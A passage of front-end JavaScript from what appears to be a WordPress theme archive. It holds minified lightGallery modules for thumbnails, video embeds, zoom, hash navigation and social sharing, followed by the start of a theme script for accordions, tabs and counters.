class="lg-pager-cont"> <span class="lg-pager"></span><div class="lg-pager-thumb-cont"><span class="lg-caret"></span> <img src="'+a(this).attr(e.core.s.exThumbImage)+'" /></div></span>':f+='<span class="lg-pager-cont"> <span class="lg-pager"></span><div class="lg-pager-thumb-cont"><span class="lg-caret"></span> <img src="'+a(this).find("img").attr("src")+'" /></div></span>'});c=e.core.$outer.find(".lg-pager-outer"),c.html(f),b=e.core.$outer.find(".lg-pager-cont"),b.on("click.lg touchend.lg",function(){var b=a(this);e.core.index=b.index(),e.core.slide(e.core.index,!1,!0,!1)}),c.on("mouseover.lg",function(){clearTimeout(d),c.addClass("lg-pager-hover")}),c.on("mouseout.lg",function(){d=setTimeout(function(){c.removeClass("lg-pager-hover")})}),e.core.$el.on("onBeforeSlide.lg.tm",function(a,c,d){b.removeClass("lg-pager-active"),b.eq(d).addClass("lg-pager-active")})},c.prototype.destroy=function(){},a.fn.lightGallery.modules.pager=c}()}),function(a,b){"function"==typeof define&&define.amd?define(["jquery"],function(a){return b(a)}):"object"==typeof module&&module.exports?module.exports=b(require("jquery")):b(a.jQuery)}(this,function(a){!function(){"use strict";var b={thumbnail:!0,animateThumb:!0,currentPagerPosition:"middle",thumbWidth:100,thumbHeight:"80px",thumbContHeight:100,thumbMargin:5,exThumbImage:!1,showThumbByDefault:!0,toogleThumb:!0,pullCaptionUp:!0,enableThumbDrag:!0,enableThumbSwipe:!0,swipeThreshold:50,loadYoutubeThumbnail:!0,youtubeThumbSize:1,loadVimeoThumbnail:!0,vimeoThumbSize:"thumbnail_small",loadDailymotionThumbnail:!0},c=function(c){return this.core=a(c).data("lightGallery"),this.core.s=a.extend({},b,this.core.s),this.$el=a(c),this.$thumbOuter=null,this.thumbOuterWidth=0,this.thumbTotalWidth=this.core.$items.length*(this.core.s.thumbWidth+this.core.s.thumbMargin),this.thumbIndex=this.core.index,this.core.s.animateThumb&&(this.core.s.thumbHeight="100%"),this.left=0,this.init(),this};c.prototype.init=function(){var a=this;this.core.s.thumbnail&&this.core.$items.length>1&&(this.core.s.showThumbByDefault&&setTimeout(function(){a.core.$outer.addClass("lg-thumb-open")},700),this.core.s.pullCaptionUp&&this.core.$outer.addClass("lg-pull-caption-up"),this.build(),this.core.s.animateThumb&&this.core.doCss()?(this.core.s.enableThumbDrag&&this.enableThumbDrag(),this.core.s.enableThumbSwipe&&this.enableThumbSwipe(),this.thumbClickable=!1):this.thumbClickable=!0,this.toogle(),this.thumbkeyPress())},c.prototype.build=function(){function b(a,b,c){var g,h=d.core.isVideo(a,c)||{},i="";h.youtube||h.vimeo||h.dailymotion?h.youtube?g=d.core.s.loadYoutubeThumbnail?"//img.youtube.com/vi/"+h.youtube[1]+"/"+d.core.s.youtubeThumbSize+".jpg":b:h.vimeo?d.core.s.loadVimeoThumbnail?(g="//i.vimeocdn.com/video/error_"+f+".jpg",i=h.vimeo[1]):g=b:h.dailymotion&&(g=d.core.s.loadDailymotionThumbnail?"//www.dailymotion.com/thumbnail/video/"+h.dailymotion[1]:b):g=b,e+='<div data-vimeo-id="'+i+'" class="lg-thumb-item" style="width:'+d.core.s.thumbWidth+"px; height: "+d.core.s.thumbHeight+"; margin-right: "+d.core.s.thumbMargin+'px"><img src="'+g+'" /></div>',i=""}var c,d=this,e="",f="",g='<div class="lg-thumb-outer"><div class="lg-thumb lg-group"></div></div>';switch(this.core.s.vimeoThumbSize){case"thumbnail_large":f="640";break;case"thumbnail_medium":f="200x150";break;case"thumbnail_small":f="100x75"}if(d.core.$outer.addClass("lg-has-thumb"),d.core.$outer.find(".lg").append(g),d.$thumbOuter=d.core.$outer.find(".lg-thumb-outer"),d.thumbOuterWidth=d.$thumbOuter.width(),d.core.s.animateThumb&&d.core.$outer.find(".lg-thumb").css({width:d.thumbTotalWidth+"px",position:"relative"}),this.core.s.animateThumb&&d.$thumbOuter.css("height",d.core.s.thumbContHeight+"px"),d.core.s.dynamic)for(var h=0;h<d.core.s.dynamicEl.length;h++)b(d.core.s.dynamicEl[h].src,d.core.s.dynamicEl[h].thumb,h);else d.core.$items.each(function(c){d.core.s.exThumbImage?b(a(this).attr("href")||a(this).attr("data-src"),a(this).attr(d.core.s.exThumbImage),c):b(a(this).attr("href")||a(this).attr("data-src"),a(this).find("img").attr("src"),c)});d.core.$outer.find(".lg-thumb").html(e),c=d.core.$outer.find(".lg-thumb-item"),c.each(function(){var b=a(this),c=b.attr("data-vimeo-id");c&&a.getJSON("//www.vimeo.com/api/v2/video/"+c+".json?callback=?",{format:"json"},function(a){b.find("img").attr("src",a[0][d.core.s.vimeoThumbSize])})}),c.eq(d.core.index).addClass("active"),d.core.$el.on("onBeforeSlide.lg.tm",function(){c.removeClass("active"),c.eq(d.core.index).addClass("active")}),c.on("click.lg touchend.lg",function(){var b=a(this);setTimeout(function(){(d.thumbClickable&&!d.core.lgBusy||!d.core.doCss())&&(d.core.index=b.index(),d.core.slide(d.core.index,!1,!0,!1))},50)}),d.core.$el.on("onBeforeSlide.lg.tm",function(){d.animateThumb(d.core.index)}),a(window).on("resize.lg.thumb orientationchange.lg.thumb",function(){setTimeout(function(){d.animateThumb(d.core.index),d.thumbOuterWidth=d.$thumbOuter.width()},200)})},c.prototype.setTranslate=function(a){this.core.$outer.find(".lg-thumb").css({transform:"translate3d(-"+a+"px, 0px, 0px)"})},c.prototype.animateThumb=function(a){var b=this.core.$outer.find(".lg-thumb");if(this.core.s.animateThumb){var c;switch(this.core.s.currentPagerPosition){case"left":c=0;break;case"middle":c=this.thumbOuterWidth/2-this.core.s.thumbWidth/2;break;case"right":c=this.thumbOuterWidth-this.core.s.thumbWidth}this.left=(this.core.s.thumbWidth+this.core.s.thumbMargin)*a-1-c,this.left>this.thumbTotalWidth-this.thumbOuterWidth&&(this.left=this.thumbTotalWidth-this.thumbOuterWidth),this.left<0&&(this.left=0),this.core.lGalleryOn?(b.hasClass("on")||this.core.$outer.find(".lg-thumb").css("transition-duration",this.core.s.speed+"ms"),this.core.doCss()||b.animate({left:-this.left+"px"},this.core.s.speed)):this.core.doCss()||b.css("left",-this.left+"px"),this.setTranslate(this.left)}},c.prototype.enableThumbDrag=function(){var b=this,c=0,d=0,e=!1,f=!1,g=0;b.$thumbOuter.addClass("lg-grab"),b.core.$outer.find(".lg-thumb").on("mousedown.lg.thumb",function(a){b.thumbTotalWidth>b.thumbOuterWidth&&(a.preventDefault(),c=a.pageX,e=!0,b.core.$outer.scrollLeft+=1,b.core.$outer.scrollLeft-=1,b.thumbClickable=!1,b.$thumbOuter.removeClass("lg-grab").addClass("lg-grabbing"))}),a(window).on("mousemove.lg.thumb",function(a){e&&(g=b.left,f=!0,d=a.pageX,b.$thumbOuter.addClass("lg-dragging"),g-=d-c,g>b.thumbTotalWidth-b.thumbOuterWidth&&(g=b.thumbTotalWidth-b.thumbOuterWidth),g<0&&(g=0),b.setTranslate(g))}),a(window).on("mouseup.lg.thumb",function(){f?(f=!1,b.$thumbOuter.removeClass("lg-dragging"),b.left=g,Math.abs(d-c)<b.core.s.swipeThreshold&&(b.thumbClickable=!0)):b.thumbClickable=!0,e&&(e=!1,b.$thumbOuter.removeClass("lg-grabbing").addClass("lg-grab"))})},c.prototype.enableThumbSwipe=function(){var a=this,b=0,c=0,d=!1,e=0;a.core.$outer.find(".lg-thumb").on("touchstart.lg",function(c){a.thumbTotalWidth>a.thumbOuterWidth&&(c.preventDefault(),b=c.originalEvent.targetTouches[0].pageX,a.thumbClickable=!1)}),a.core.$outer.find(".lg-thumb").on("touchmove.lg",function(f){a.thumbTotalWidth>a.thumbOuterWidth&&(f.preventDefault(),c=f.originalEvent.targetTouches[0].pageX,d=!0,a.$thumbOuter.addClass("lg-dragging"),e=a.left,e-=c-b,e>a.thumbTotalWidth-a.thumbOuterWidth&&(e=a.thumbTotalWidth-a.thumbOuterWidth),e<0&&(e=0),a.setTranslate(e))}),a.core.$outer.find(".lg-thumb").on("touchend.lg",function(){a.thumbTotalWidth>a.thumbOuterWidth&&d?(d=!1,a.$thumbOuter.removeClass("lg-dragging"),Math.abs(c-b)<a.core.s.swipeThreshold&&(a.thumbClickable=!0),a.left=e):a.thumbClickable=!0})},c.prototype.toogle=function(){var a=this
;a.core.s.toogleThumb&&(a.core.$outer.addClass("lg-can-toggle"),a.$thumbOuter.append('<button aria-label="Toggle thumbnails" class="lg-toogle-thumb lg-icon"></button>'),a.core.$outer.find(".lg-toogle-thumb").on("click.lg",function(){a.core.$outer.toggleClass("lg-thumb-open")}))},c.prototype.thumbkeyPress=function(){var b=this;a(window).on("keydown.lg.thumb",function(a){38===a.keyCode?(a.preventDefault(),b.core.$outer.addClass("lg-thumb-open")):40===a.keyCode&&(a.preventDefault(),b.core.$outer.removeClass("lg-thumb-open"))})},c.prototype.destroy=function(){this.core.s.thumbnail&&this.core.$items.length>1&&(a(window).off("resize.lg.thumb orientationchange.lg.thumb keydown.lg.thumb"),this.$thumbOuter.remove(),this.core.$outer.removeClass("lg-has-thumb"))},a.fn.lightGallery.modules.Thumbnail=c}()}),function(a,b){"function"==typeof define&&define.amd?define(["jquery"],function(a){return b(a)}):"object"==typeof module&&module.exports?module.exports=b(require("jquery")):b(a.jQuery)}(this,function(a){!function(){"use strict";function b(a,b,c,d){var e=this;if(e.core.$slide.eq(b).find(".lg-video").append(e.loadVideo(c,"lg-object",!0,b,d)),d)if(e.core.s.videojs)try{videojs(e.core.$slide.eq(b).find(".lg-html5").get(0),e.core.s.videojsOptions,function(){!e.videoLoaded&&e.core.s.autoplayFirstVideo&&this.play()})}catch(a){console.error("Make sure you have included videojs")}else!e.videoLoaded&&e.core.s.autoplayFirstVideo&&e.core.$slide.eq(b).find(".lg-html5").get(0).play()}function c(a,b){var c=this.core.$slide.eq(b).find(".lg-video-cont");c.hasClass("lg-has-iframe")||(c.css("max-width",this.core.s.videoMaxWidth),this.videoLoaded=!0)}function d(b,c,d){var e=this,f=e.core.$slide.eq(c),g=f.find(".lg-youtube").get(0),h=f.find(".lg-vimeo").get(0),i=f.find(".lg-dailymotion").get(0),j=f.find(".lg-vk").get(0),k=f.find(".lg-html5").get(0);if(g)g.contentWindow.postMessage('{"event":"command","func":"pauseVideo","args":""}',"*");else if(h)try{$f(h).api("pause")}catch(a){console.error("Make sure you have included froogaloop2 js")}else if(i)i.contentWindow.postMessage("pause","*");else if(k)if(e.core.s.videojs)try{videojs(k).pause()}catch(a){console.error("Make sure you have included videojs")}else k.pause();j&&a(j).attr("src",a(j).attr("src").replace("&autoplay","&noplay"));var l;l=e.core.s.dynamic?e.core.s.dynamicEl[d].src:e.core.$items.eq(d).attr("href")||e.core.$items.eq(d).attr("data-src");var m=e.core.isVideo(l,d)||{};(m.youtube||m.vimeo||m.dailymotion||m.vk)&&e.core.$outer.addClass("lg-hide-download")}var e={videoMaxWidth:"855px",autoplayFirstVideo:!0,youtubePlayerParams:!1,vimeoPlayerParams:!1,dailymotionPlayerParams:!1,vkPlayerParams:!1,videojs:!1,videojsOptions:{}},f=function(b){return this.core=a(b).data("lightGallery"),this.$el=a(b),this.core.s=a.extend({},e,this.core.s),this.videoLoaded=!1,this.init(),this};f.prototype.init=function(){var e=this;e.core.$el.on("hasVideo.lg.tm",b.bind(this)),e.core.$el.on("onAferAppendSlide.lg.tm",c.bind(this)),e.core.doCss()&&e.core.$items.length>1&&(e.core.s.enableSwipe||e.core.s.enableDrag)?e.core.$el.on("onSlideClick.lg.tm",function(){var a=e.core.$slide.eq(e.core.index);e.loadVideoOnclick(a)}):e.core.$slide.on("click.lg",function(){e.loadVideoOnclick(a(this))}),e.core.$el.on("onBeforeSlide.lg.tm",d.bind(this)),e.core.$el.on("onAfterSlide.lg.tm",function(a,b){e.core.$slide.eq(b).removeClass("lg-video-playing")}),e.core.s.autoplayFirstVideo&&e.core.$el.on("onAferAppendSlide.lg.tm",function(a,b){if(!e.core.lGalleryOn){var c=e.core.$slide.eq(b);setTimeout(function(){e.loadVideoOnclick(c)},100)}})},f.prototype.loadVideo=function(b,c,d,e,f){var g,h=this,i="",j=1,k="",l=this.core.isVideo(b,e)||{};if(g=h.core.s.dynamic?h.core.s.dynamicEl[h.core.index].title:h.core.$items.eq(h.core.index).attr("title")||h.core.$items.eq(h.core.index).find("img").first().attr("alt"),g=g?'title="'+g+'"':"",d&&(j=this.videoLoaded?0:this.core.s.autoplayFirstVideo?1:0),l.youtube)k="?wmode=opaque&autoplay="+j+"&enablejsapi=1",this.core.s.youtubePlayerParams&&(k=k+"&"+a.param(this.core.s.youtubePlayerParams)),i='<iframe class="lg-video-object lg-youtube '+c+'" '+g+' width="560" height="315" src="//www.youtube.com/embed/'+l.youtube[1]+k+'" frameborder="0" allowfullscreen></iframe>';else if(l.vimeo)k="?autoplay="+j+"&api=1",this.core.s.vimeoPlayerParams&&(k=k+"&"+a.param(this.core.s.vimeoPlayerParams)),i='<iframe class="lg-video-object lg-vimeo '+c+'" '+g+' width="560" height="315"  src="//player.vimeo.com/video/'+l.vimeo[1]+k+'" frameborder="0" webkitAllowFullScreen mozallowfullscreen allowFullScreen></iframe>';else if(l.dailymotion)k="?wmode=opaque&autoplay="+j+"&api=postMessage",this.core.s.dailymotionPlayerParams&&(k=k+"&"+a.param(this.core.s.dailymotionPlayerParams)),i='<iframe class="lg-video-object lg-dailymotion '+c+'" '+g+' width="560" height="315" src="//www.dailymotion.com/embed/video/'+l.dailymotion[1]+k+'" frameborder="0" allowfullscreen></iframe>';else if(l.html5){var m=f.substring(0,1);"."!==m&&"#"!==m||(f=a(f).html()),i=f}else l.vk&&(k="&autoplay="+j,this.core.s.vkPlayerParams&&(k=k+"&"+a.param(this.core.s.vkPlayerParams)),i='<iframe class="lg-video-object lg-vk '+c+'" '+g+' width="560" height="315" src="//vk.com/video_ext.php?'+l.vk[1]+k+'" frameborder="0" allowfullscreen></iframe>');return i},f.prototype.loadVideoOnclick=function(a){var b=this;if(a.find(".lg-object").hasClass("lg-has-poster")&&a.find(".lg-object").is(":visible"))if(a.hasClass("lg-has-video")){var c=a.find(".lg-youtube").get(0),d=a.find(".lg-vimeo").get(0),e=a.find(".lg-dailymotion").get(0),f=a.find(".lg-html5").get(0);if(c)c.contentWindow.postMessage('{"event":"command","func":"playVideo","args":""}',"*");else if(d)try{$f(d).api("play")}catch(a){console.error("Make sure you have included froogaloop2 js")}else if(e)e.contentWindow.postMessage("play","*");else if(f)if(b.core.s.videojs)try{videojs(f).play()}catch(a){console.error("Make sure you have included videojs")}else f.play();a.addClass("lg-video-playing")}else{a.addClass("lg-video-playing lg-has-video");var g,h,i=function(c,d){if(a.find(".lg-video").append(b.loadVideo(c,"",!1,b.core.index,d)),d)if(b.core.s.videojs)try{videojs(b.core.$slide.eq(b.core.index).find(".lg-html5").get(0),b.core.s.videojsOptions,function(){this.play()})}catch(a){console.error("Make sure you have included videojs")}else b.core.$slide.eq(b.core.index).find(".lg-html5").get(0).play()};b.core.s.dynamic?(g=b.core.s.dynamicEl[b.core.index].src,h=b.core.s.dynamicEl[b.core.index].html,i(g,h)):(g=b.core.$items.eq(b.core.index).attr("href")||b.core.$items.eq(b.core.index).attr("data-src"),h=b.core.$items.eq(b.core.index).attr("data-html"),i(g,h));var j=a.find(".lg-object");a.find(".lg-video").append(j),a.find(".lg-video-object").hasClass("lg-html5")||(a.removeClass("lg-complete"),a.find(".lg-video-object").on("load.lg error.lg",function(){a.addClass("lg-complete")}))}},f.prototype.destroy=function(){this.videoLoaded=!1},a.fn.lightGallery.modules.video=f}()}),function(a,b){"function"==typeof define&&define.amd?define(["jquery"],function(a){return b(a)}):"object"==typeof module&&module.exports?module.exports=b(require("jquery")):b(a.jQuery)}(this,function(a){!function(){"use strict";var b=function(){var a=!1,b=navigator.userAgent.match(/Chrom(e|ium)\/([0-9]+)\./);return b&&parseInt(b[2],10)<54&&(a=!0),a},c={scale:1,zoom:!0,actualSize:!0,enableZoomAfter:300,useLeftForZoom:b()},d=function(b){return this.core=a(b).data("lightGallery"),this.core.s=a.extend({},c,this.core.s),this.core.s.zoom&&this.core.doCss()&&(this.init(),this.zoomabletimeout=!1,this.pageX=a(window).width()/2,this.pageY=a(window).height()/2+a(window).scrollTop()),this};d.prototype.init=function(){var b=this,c='<button aria-label="Zoom in" id="lg-zoom-in" class="lg-icon"></button><button aria-label="Zoom out" id="lg-zoom-out" class="lg-icon"></button>';b.core.s.actualSize&&(c+='<button aria-label="Actual size" id="lg-actual-size" class="lg-icon"></button>'),b.core.s.useLeftForZoom?b.core.$outer.addClass("lg-use-left-for-zoom"):b.core.$outer.addClass("lg-use-transition-for-zoom"),this.core.$outer.find(".lg-toolbar").append(c),b.core.$el.on("onSlideItemLoad.lg.tm.zoom",function(c,d,e){var f=b.core.s.enableZoomAfter+e;a("body").hasClass("lg-from-hash")&&e?f=0:a("body").removeClass("lg-from-hash"),b.zoomabletimeout=setTimeout(function(){b.core.$slide.eq(d).addClass("lg-zoomable")},f+30)});var d=1,e=function(c){var d,e,f=b.core.$outer.find(".lg-current .lg-image"),g=(a(window).width()-f.prop("offsetWidth"))/2,h=(a(window).height()-f.prop("offsetHeight"))/2+a(window).scrollTop();d=b.pageX-g,e=b.pageY-h;var i=(c-1)*d,j=(c-1)*e;f.css("transform","scale3d("+c+", "+c+", 1)").attr("data-scale",c),b.core.s.useLeftForZoom?f.parent().css({left:-i+"px",top:-j+"px"}).attr("data-x",i).attr("data-y",j):f.parent().css("transform","translate3d(-"+i+"px, -"+j+"px, 0)").attr("data-x",i).attr("data-y",j)},f=function(){d>1?b.core.$outer.addClass("lg-zoomed"):b.resetZoom(),d<1&&(d=1),e(d)},g=function(c,e,g,h){var i,j=e.prop("offsetWidth");i=b.core.s.dynamic?b.core.s.dynamicEl[g].width||e[0].naturalWidth||j:b.core.$items.eq(g).attr("data-width")||e[0].naturalWidth||j;var k;b.core.$outer.hasClass("lg-zoomed")?d=1:i>j&&(k=i/j,d=k||2),h?(b.pageX=a(window).width()/2,b.pageY=a(window).height()/2+a(window).scrollTop()):(b.pageX=c.pageX||c.originalEvent.targetTouches[0].pageX,b.pageY=c.pageY||c.originalEvent.targetTouches[0].pageY),f(),setTimeout(function(){b.core.$outer.removeClass("lg-grabbing").addClass("lg-grab")},10)},h=!1;b.core.$el.on("onAferAppendSlide.lg.tm.zoom",function(a,c){var d=b.core.$slide.eq(c).find(".lg-image");d.on("dblclick",function(a){g(a,d,c)}),d.on("touchstart",function(a){h?(clearTimeout(h),h=null,g(a,d,c)):h=setTimeout(function(){h=null},300),a.preventDefault()})}),a(window).on("resize.lg.zoom scroll.lg.zoom orientationchange.lg.zoom",function(){b.pageX=a(window).width()/2,b.pageY=a(window).height()/2+a(window).scrollTop(),e(d)}),a("#lg-zoom-out").on("click.lg",function(){b.core.$outer.find(".lg-current .lg-image").length&&(d-=b.core.s.scale,f())}),a("#lg-zoom-in").on("click.lg",function(){b.core.$outer.find(".lg-current .lg-image").length&&(d+=b.core.s.scale,f())}),a("#lg-actual-size").on("click.lg",function(a){g(a,b.core.$slide.eq(b.core.index).find(".lg-image"),b.core.index,!0)}),b.core.$el.on("onBeforeSlide.lg.tm",function(){d=1,b.resetZoom()}),b.zoomDrag(),b.zoomSwipe()},d.prototype.resetZoom=function(){this.core.$outer.removeClass("lg-zoomed"),this.core.$slide.find(".lg-img-wrap").removeAttr("style data-x data-y"),this.core.$slide.find(".lg-image").removeAttr("style data-scale"),this.pageX=a(window).width()/2,this.pageY=a(window).height()/2+a(window).scrollTop()},d.prototype.zoomSwipe=function(){var a=this,b={},c={},d=!1,e=!1,f=!1;a.core.$slide.on("touchstart.lg",function(c){if(a.core.$outer.hasClass("lg-zoomed")){var d=a.core.$slide.eq(a.core.index).find(".lg-object");f=d.prop("offsetHeight")*d.attr("data-scale")>a.core.$outer.find(".lg").height(),e=d.prop("offsetWidth")*d.attr("data-scale")>a.core.$outer.find(".lg").width(),(e||f)&&(c.preventDefault(),b={x:c.originalEvent.targetTouches[0].pageX,y:c.originalEvent.targetTouches[0].pageY})}}),a.core.$slide.on("touchmove.lg",function(g){if(a.core.$outer.hasClass("lg-zoomed")){var h,i,j=a.core.$slide.eq(a.core.index).find(".lg-img-wrap");g.preventDefault(),d=!0,c={x:g.originalEvent.targetTouches[0].pageX,y:g.originalEvent.targetTouches[0].pageY},a.core.$outer.addClass("lg-zoom-dragging"),i=f?-Math.abs(j.attr("data-y"))+(c.y-b.y):-Math.abs(j.attr("data-y")),h=e?-Math.abs(j.attr("data-x"))+(c.x-b.x):-Math.abs(j.attr("data-x")),(Math.abs(c.x-b.x)>15||Math.abs(c.y-b.y)>15)&&(a.core.s.useLeftForZoom?j.css({left:h+"px",top:i+"px"}):j.css("transform","translate3d("+h+"px, "+i+"px, 0)"))}}),a.core.$slide.on("touchend.lg",function(){a.core.$outer.hasClass("lg-zoomed")&&d&&(d=!1,a.core.$outer.removeClass("lg-zoom-dragging"),a.touchendZoom(b,c,e,f))})},d.prototype.zoomDrag=function(){var b=this,c={},d={},e=!1,f=!1,g=!1,h=!1;b.core.$slide.on("mousedown.lg.zoom",function(d){var f=b.core.$slide.eq(b.core.index).find(".lg-object");h=f.prop("offsetHeight")*f.attr("data-scale")>b.core.$outer.find(".lg").height(),g=f.prop("offsetWidth")*f.attr("data-scale")>b.core.$outer.find(".lg").width(),b.core.$outer.hasClass("lg-zoomed")&&a(d.target).hasClass("lg-object")&&(g||h)&&(d.preventDefault(),c={x:d.pageX,y:d.pageY},e=!0,b.core.$outer.scrollLeft+=1,b.core.$outer.scrollLeft-=1,b.core.$outer.removeClass("lg-grab").addClass("lg-grabbing"))}),a(window).on("mousemove.lg.zoom",function(a){if(e){var i,j,k=b.core.$slide.eq(b.core.index).find(".lg-img-wrap");f=!0,d={x:a.pageX,y:a.pageY},b.core.$outer.addClass("lg-zoom-dragging"),j=h?-Math.abs(k.attr("data-y"))+(d.y-c.y):-Math.abs(k.attr("data-y")),i=g?-Math.abs(k.attr("data-x"))+(d.x-c.x):-Math.abs(k.attr("data-x")),b.core.s.useLeftForZoom?k.css({left:i+"px",top:j+"px"}):k.css("transform","translate3d("+i+"px, "+j+"px, 0)")}}),a(window).on("mouseup.lg.zoom",function(a){e&&(e=!1,b.core.$outer.removeClass("lg-zoom-dragging"),!f||c.x===d.x&&c.y===d.y||(d={x:a.pageX,y:a.pageY},b.touchendZoom(c,d,g,h)),f=!1),b.core.$outer.removeClass("lg-grabbing").addClass("lg-grab")})},d.prototype.touchendZoom=function(a,b,c,d){var e=this,f=e.core.$slide.eq(e.core.index).find(".lg-img-wrap"),g=e.core.$slide.eq(e.core.index).find(".lg-object"),h=-Math.abs(f.attr("data-x"))+(b.x-a.x),i=-Math.abs(f.attr("data-y"))+(b.y-a.y),j=(e.core.$outer.find(".lg").height()-g.prop("offsetHeight"))/2,k=Math.abs(g.prop("offsetHeight")*Math.abs(g.attr("data-scale"))-e.core.$outer.find(".lg").height()+j),l=(e.core.$outer.find(".lg").width()-g.prop("offsetWidth"))/2,m=Math.abs(g.prop("offsetWidth")*Math.abs(g.attr("data-scale"))-e.core.$outer.find(".lg").width()+l);(Math.abs(b.x-a.x)>15||Math.abs(b.y-a.y)>15)&&(d&&(i<=-k?i=-k:i>=-j&&(i=-j)),c&&(h<=-m?h=-m:h>=-l&&(h=-l)),d?f.attr("data-y",Math.abs(i)):i=-Math.abs(f.attr("data-y")),c?f.attr("data-x",Math.abs(h)):h=-Math.abs(f.attr("data-x")),e.core.s.useLeftForZoom?f.css({left:h+"px",top:i+"px"}):f.css("transform","translate3d("+h+"px, "+i+"px, 0)"))},d.prototype.destroy=function(){var b=this;b.core.$el.off(".lg.zoom"),a(window).off(".lg.zoom"),b.core.$slide.off(".lg.zoom"),b.core.$el.off(".lg.tm.zoom"),b.resetZoom(),clearTimeout(b.zoomabletimeout),b.zoomabletimeout=!1},a.fn.lightGallery.modules.zoom=d}()}),function(a,b){"function"==typeof define&&define.amd?define(["jquery"],function(a){return b(a)}):"object"==typeof exports?module.exports=b(require("jquery")):b(jQuery)}(0,function(a){!function(){"use strict";var b={hash:!0},c=function(c){return this.core=a(c).data("lightGallery"),this.core.s=a.extend({},b,this.core.s),this.core.s.hash&&(this.oldHash=window.location.hash,this.init()),this};c.prototype.init=function(){var b,c=this;c.core.$el.on("onAfterSlide.lg.tm",function(a,b,d){history.replaceState?history.replaceState(null,null,window.location.pathname+window.location.search+"#lg="+c.core.s.galleryId+"&slide="+d):window.location.hash="lg="+c.core.s.galleryId+"&slide="+d}),a(window).on("hashchange.lg.hash",function(){b=window.location.hash;var a=parseInt(b.split("&slide=")[1],10);b.indexOf("lg="+c.core.s.galleryId)>-1?c.core.slide(a,!1,!1):c.core.lGalleryOn&&c.core.destroy()})},c.prototype.destroy=function(){this.core.s.hash&&(this.oldHash&&this.oldHash.indexOf("lg="+this.core.s.galleryId)<0?history.replaceState?history.replaceState(null,null,this.oldHash):window.location.hash=this.oldHash:history.replaceState?history.replaceState(null,document.title,window.location.pathname+window.location.search):window.location.hash="",this.core.$el.off(".lg.hash"))},a.fn.lightGallery.modules.hash=c}()}),function(a,b){"function"==typeof define&&define.amd?define(["jquery"],function(a){return b(a)}):"object"==typeof module&&module.exports?module.exports=b(require("jquery")):b(a.jQuery)}(this,function(a){!function(){"use strict";var b={share:!0,facebook:!0,facebookDropdownText:"Facebook",twitter:!0,twitterDropdownText:"Twitter",googlePlus:!0,googlePlusDropdownText:"GooglePlus",pinterest:!0,pinterestDropdownText:"Pinterest"},c=function(c){return this.core=a(c).data("lightGallery"),this.core.s=a.extend({},b,this.core.s),this.core.s.share&&this.init(),this};c.prototype.init=function(){var b=this,c='<button aria-label="Share" id="lg-share" class="lg-icon" aria-haspopup="true" aria-expanded="false"><ul class="lg-dropdown" style="position: absolute;">';c+=b.core.s.facebook?'<li><a id="lg-share-facebook" target="_blank"><span class="lg-icon"></span><span class="lg-dropdown-text">'+this.core.s.facebookDropdownText+"</span></a></li>":"",c+=b.core.s.twitter?'<li><a id="lg-share-twitter" target="_blank"><span class="lg-icon"></span><span class="lg-dropdown-text">'+this.core.s.twitterDropdownText+"</span></a></li>":"",c+=b.core.s.googlePlus?'<li><a id="lg-share-googleplus" target="_blank"><span class="lg-icon"></span><span class="lg-dropdown-text">'+this.core.s.googlePlusDropdownText+"</span></a></li>":"",c+=b.core.s.pinterest?'<li><a id="lg-share-pinterest" target="_blank"><span class="lg-icon"></span><span class="lg-dropdown-text">'+this.core.s.pinterestDropdownText+"</span></a></li>":"",c+="</ul></button>",this.core.$outer.find(".lg-toolbar").append(c),this.core.$outer.find(".lg").append('<div id="lg-dropdown-overlay"></div>'),a("#lg-share").on("click.lg",function(){b.core.$outer.toggleClass("lg-dropdown-active");var c=a("#lg-share").attr("aria-expanded");a("#lg-share").attr("aria-expanded","true"!==c)}),a("#lg-dropdown-overlay").on("click.lg",function(){b.core.$outer.removeClass("lg-dropdown-active"),a("#lg-share").attr("aria-expanded",!1)}),b.core.$el.on("onAfterSlide.lg.tm",function(c,d,e){setTimeout(function(){a("#lg-share-facebook").attr("href","https://www.facebook.com/sharer/sharer.php?u="+encodeURIComponent(b.getSahreProps(e,"facebookShareUrl")||window.location.href)),a("#lg-share-twitter").attr("href","https://twitter.com/intent/tweet?text="+b.getSahreProps(e,"tweetText")+"&url="+encodeURIComponent(b.getSahreProps(e,"twitterShareUrl")||window.location.href)),a("#lg-share-googleplus").attr("href","https://plus.google.com/share?url="+encodeURIComponent(b.getSahreProps(e,"googleplusShareUrl")||window.location.href)),a("#lg-share-pinterest").attr("href","http://www.pinterest.com/pin/create/button/?url="+encodeURIComponent(b.getSahreProps(e,"pinterestShareUrl")||window.location.href)+"&media="+encodeURIComponent(b.getSahreProps(e,"src"))+"&description="+b.getSahreProps(e,"pinterestText"))},100)})},c.prototype.getSahreProps=function(a,b){var c="";if(this.core.s.dynamic)c=this.core.s.dynamicEl[a][b];else{var d=this.core.$items.eq(a).attr("href"),e=this.core.$items.eq(a).data(b);c="src"===b?d||e:e}return c},c.prototype.destroy=function(){},a.fn.lightGallery.modules.share=c}()});PK�8FZ3��x�xjs/elementor.jsnu�[���( function( $ ) {
    'use strict';

    /* rtl check */
	function rtl_owl(){
    if ($('body').hasClass("rtl")) {
        return true;
    } else {
        return false;
    }};

    function rtl_isotop(){
        if ($('body').hasClass("rtl")) {
            return false;
        } else {
            return true;
    }};

    /* --------------------------------------------------
    * accordions
    * --------------------------------------------------*/
    var customAccordions = function ($scope, $) {
        $scope.find('.ot-accordions').each( function () {
            var selector = $(this),
                content = selector.find('.acc-content'),
                header  = selector.find('.acc-toggle');

            header.off("click");

            header.each(function(){
                if ($(this).data('default') == 'yes') {
                    $(this).next().addClass('active').slideDown(300);
                    $(this).parent().addClass('current');
                }
            });

            header.on('click', function(e){
                e.preventDefault();
                var $this = $(this);

                $this.next().toggleClass('active').slideToggle(300);
                $this.parent().toggleClass('current');
                content.not($this.next()).slideUp(300);
                header.not($this).parent().removeClass('current');
            });
        });
    };

    /* --------------------------------------------------
    * tabs
    * --------------------------------------------------*/
    var customTabs = function ($scope, $) {

        $scope.find('.ot-tabs').each(function() {
            var selector = $(this),
                tabs     = selector.find('.tabs-heading li'),
                content  = selector.find('.tab-content');
            tabs.first().addClass('current');
            content.first().addClass('current');

            tabs.on( 'click', function(){
                var tab_id = $(this).attr('data-tab');
                $(this).siblings().removeClass('current');
                $(this).parents('.ot-tabs').find('.tab-content').removeClass('current');
                $(this).addClass('current');
                $("#"+tab_id).addClass('current');
            });
        });
    };

    /* --------------------------------------------------
     * counter
     * --------------------------------------------------*/
    var iCounter = function () {
        $('.icounter[data-counter]').each( function () {
            var scrollTop   = $(document).scrollTop() + $(window).height();
